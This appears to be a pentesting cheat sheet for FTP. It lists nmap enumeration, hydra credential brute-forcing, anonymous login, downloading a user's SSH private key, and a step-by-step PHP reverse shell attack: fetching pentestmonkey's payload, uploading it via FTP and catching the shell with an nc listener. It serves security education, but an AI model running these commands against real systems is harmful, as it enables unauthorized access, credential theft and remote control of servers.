FTP (File Transfer Protocol) Pentesting

Last modified: 2023-02-11

Network Reverse Shell

FTP is a standard communication protocol used for the transfer of computer files from a server to a client on a computer network. Default ports are 20 (for data), 21 (for control).

Enumeration

nmap --script ftp-anon -p 21 <target-ip>
nmap --script ftp-vuln* -p 21 <target-ip>
nmap --script ftp-* -p 21 <target-ip>

Brute Force Credentials

hydra -l username -P passwords.txt <target-ip> ftp
hydra -L username.txt -p password <target-ip> ftp

hydra -l username -P passwords.txt ftp://<target-ip>
hydra -L usernames.txt -p password ftp://<target-ip>

Investigation

nc <target-ip> 21

Using OpenSSL

First off, open listener.

nc -vn <target-ip> 21

Then run the command below.

openssl s_client -connect <target-ip>:21 -starttls ftp

Connect

ftp <target-ip>
ftp <target-ip> <target-port>

Sometimes we might be able to the anonymous login.
Not likely, but worth a try.

ftp <target-ip>
username: anonymous
password: anonymous

Commands in FTP

After connecting FTP, we can search directories and files, then download them to your local machine, and put local files to the target system.
The FTP commands are almost the same as Linux commands.

ftp> pwd
ftp> cd
ftp> ls
# Print the content of the file
ftp> get example.txt -

# Switch to passive mode.
ftp> passive

# Print usage
ftp> ?

Transfer Files

To transfer files to local machine,

ftp> get example.txt
ftp> get home/user/.ssh/id_rsa ./id_rsa

# recursive
wget -r --user='username' --password='password' ftp://<target-ip>/sample

Reverse Shell over Website

If the target website allows users to access the ftp directory, we can upload the exploit for the reverse shell and get a shell.

  1. Download the Payload

    Get the payload for the reverse shell from this repository.

    wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php

# --------------------------------------------------------------------------------

# Edit some variables in shell.php
$ip = '<your-local-ip>';
$port = 1234;

  2. Upload the Payload to FTP Directory

    Connect to FTP and upload the payload.

    ftp <target-ip>

# Upload the payload you downloaded
ftp> put shell.php

  3. Get a Shell

    At first, w need to open listener in your local machine.

    nc -lvnp 1234

    In a web browser, access to "http://vulnerable.com/path/to/ftp/shell.php".
    We should get a target shell.


Start FTP Server

1. Install vsftpd

sudp apt install vsftpd

To check the config file for vsftpd, run the following command.

less /etc/vsftpd.conf

2. Start FTP Server

Below are commands for starting FTP server and checking the status.

sudo systemctl start vsftpd
sudo systemctl status vsftpd

If you’ve updated the config file, you need to restart vsftpd.

sudo systemctl restart vsftpd